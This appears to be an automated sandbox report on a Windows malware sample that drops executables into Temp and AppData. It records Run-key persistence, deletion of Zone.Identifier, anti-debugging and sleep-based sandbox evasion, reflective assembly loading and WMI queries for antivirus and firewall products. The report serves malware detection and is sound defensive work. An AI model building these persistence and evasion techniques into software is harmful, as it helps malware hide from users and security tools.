    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeUnpacked PE file: 2.2.rnixgfly.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_004059D5 push ecx; ret 1_2_004059E8
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 2_2_0040D2E1 push ecx; ret 2_2_0040D2F4
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0040B4A5 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0040B4A5
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeFile created: C:\Users\user\AppData\Local\Temp\rnixgfly.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeFile created: C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ryhcwrfexidnfvJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ryhcwrfexidnfvJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeFile opened: C:\Users\user\AppData\Local\Temp\rnixgfly.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-8638
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exe TID: 2104Thread sleep time: -9223372036854770s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_1-7356
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWindow / User API: threadDelayed 9131Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWindow / User API: foregroundWindowGot 758Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWindow / User API: foregroundWindowGot 867Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeAPI coverage: 8.0 %
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_00480EBF GetSystemInfo,1_2_00480EBF
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 2_2_00406715 FindFirstFileExW,2_2_00406715
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeAPI call chain: ExitProcess graph end nodegraph_0-3476
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeAPI call chain: ExitProcess graph end nodegraph_1-7292
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeAPI call chain: ExitProcess graph end nodegraph_2-7591
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeAPI call chain: ExitProcess graph end nodegraph_2-7537
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0040800D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040800D
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0040B4A5 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0040B4A5
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0040E833 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_0040E833
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0048005F mov eax, dword ptr fs:[00000030h]1_2_0048005F
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0048017B mov eax, dword ptr fs:[00000030h]1_2_0048017B
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_00480109 mov eax, dword ptr fs:[00000030h]1_2_00480109
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0048013E mov eax, dword ptr fs:[00000030h]1_2_0048013E
    Source: C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeMemory allocated: page read and write | page guardJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0040800D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040800D
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0040353D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040353D
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_004066DE SetUnhandledExceptionFilter,1_2_004066DE
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 2_2_00401E16 SetUnhandledExceptionFilter,2_2_00401E16
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 2_2_00401C83 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00401C83
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 2_2_004060A4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004060A4
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 2_2_00401F2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00401F2A

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\rnixgfly.exe protection: execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeProcess created: C:\Users\user\AppData\Local\Temp\rnixgfly.exe C:\Users\user~1\AppData\Local\Temp\rnixgfly.exeJump to behavior
    Source: rnixgfly.exe, 00000002.00000002.502791120.0000000002836000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerh+
    Source: rnixgfly.exe, 00000002.00000002.502791120.0000000002836000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000026B4000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000027E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
    Source: rnixgfly.exe, 00000002.00000002.511029630.0000000007A5C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program ManagerDD
    Source: rnixgfly.exe, 00000002.00000002.502791120.000000000296C000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.0000000002A88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerX
    Source: rnixgfly.exe, 00000002.00000002.502791120.0000000002BAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager$5
    Source: rnixgfly.exe, 00000002.00000002.511004163.000000000769C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager x
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 2_2_0040207B cpuid 2_2_0040207B
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 1_2_0040758B GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_0040758B
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
